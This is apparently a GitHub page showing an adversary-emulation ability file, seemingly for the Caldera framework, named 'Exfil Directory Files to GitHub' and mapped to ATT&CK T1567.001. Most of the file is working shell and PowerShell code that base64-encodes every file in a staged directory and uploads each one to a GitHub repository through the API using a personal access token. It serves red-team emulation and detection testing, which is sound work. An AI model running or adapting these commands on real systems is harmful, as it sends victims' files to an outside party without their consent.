-
Notifications
You must be signed in to change notification settings - Fork 45
/
a201bec2-a193-4b58-bf0e-57fa621da474.yml
65 lines (63 loc) · 2.93 KB
/
a201bec2-a193-4b58-bf0e-57fa621da474.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
- id: a201bec2-a193-4b58-bf0e-57fa621da474
name: Exfil Directory Files to GitHub
description: |
This ability will exfiltrate all files in a set staged directory to a repository in GitHub.
tactic: exfiltration
technique:
attack_id: T1567.001
name: Exfiltration to Code Repository
platforms:
linux:
sh:
command: |
GHUser="#{github.user.name}";
GHRepo="#{github.repository.name}";
GHPAT="#{github.access.token}";
GHBranch='#{github.repository.branch}';
LocalDirectory=#{host.dir.staged};
Header="Authorization: token $GHPAT";
for file in $LocalDirectory/*.*; do
TempName=$(echo $file | sed "s/ /-/g")
RemoteName="$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename "$TempName")";
echo "{\"message\":\"Committed $(basename $TempName) at: $(date)\", \"branch\":\"$GHBranch\", \"content\":\"" >/tmp/b64;
base64 -w 0 "$file" >>/tmp/b64;
echo "\"}" >>/tmp/b64;
content=$(curl -s -X PUT -H "Accept: application/vnd.github.v3+json" -H "$Header" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);
rm /tmp/b64;
done;
windows:
psh,pwsh:
command: |
$GHUser = "#{github.user.name}";
$GHRepo = "#{github.repository.name}";
$GHPAT = "#{github.access.token}";
$GHBranch = '#{github.repository.branch}';
$LocalDirectory = "#{host.dir.staged}";
$token = $GHUser + ":" + $GHPAT;
$basetoken = [System.Convert]::ToBase64String([char[]]$token);
$Headers = @{
Authorization = 'Basic {0}' -f $basetoken;
};
$Files = Get-ChildItem $LocalDirectory;
foreach ($file in $Files){
$RemoteName = "$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)";
$uri = "https://api.github.com/repos/" + $GHUser + "/" + $GHRepo + "/contents/" + $RemoteName;
$FileBytes = Get-Content -Path $file.FullName -Encoding Byte;
$Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);
$Body = @{
path = $file.Name;
branch = $GHBranch;
content = $Base64EncodedFileBytes;
encoding = 'base64';
message = "Committed " + $file.name + " at: " + (Get-Date);
} | ConvertTo-Json;
try {
$content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;
} catch {
if ($PSItem -notmatch "but expected") { $PSItem; }
else { $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }
}
};
requirements:
- plugins.stockpile.app.requirements.paw_provenance:
- source: host.dir.staged